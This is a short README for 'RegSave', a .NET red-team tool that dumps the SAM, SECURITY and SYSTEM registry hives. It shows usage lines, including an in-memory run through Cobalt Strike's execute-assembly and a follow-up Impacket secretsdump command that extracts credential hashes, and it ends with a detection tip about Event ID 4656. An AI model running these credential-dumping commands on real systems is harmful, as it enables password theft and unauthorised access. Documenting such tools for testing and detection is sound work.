RegSave
A .NET implementation to dump SAM / SECURITY / SYSTEM registry hives
Install / Use
/learn @EncodeGroup/RegSaveREADME
RegSave
A .NET 3.5 application that will dump SAM / SYSTEM / SECURITY registry keys to a path of your choosing.
Usage
regsave.exe c:\Users\USER\Appdata\Local
execute-assembly /opt/CS/toolkit/regsave.exe c:\Users\USER\Appdata\Local
Collect the files and then parse them with Impacket secretsdump
secretsdump.py -sam samantha.txt -security secundum.txt -system systemless.txt LOCAL
Detection
Look for Event ID 4656 after configuring audit policy.
More info at Detecting Attempts to steal passwords from the registry
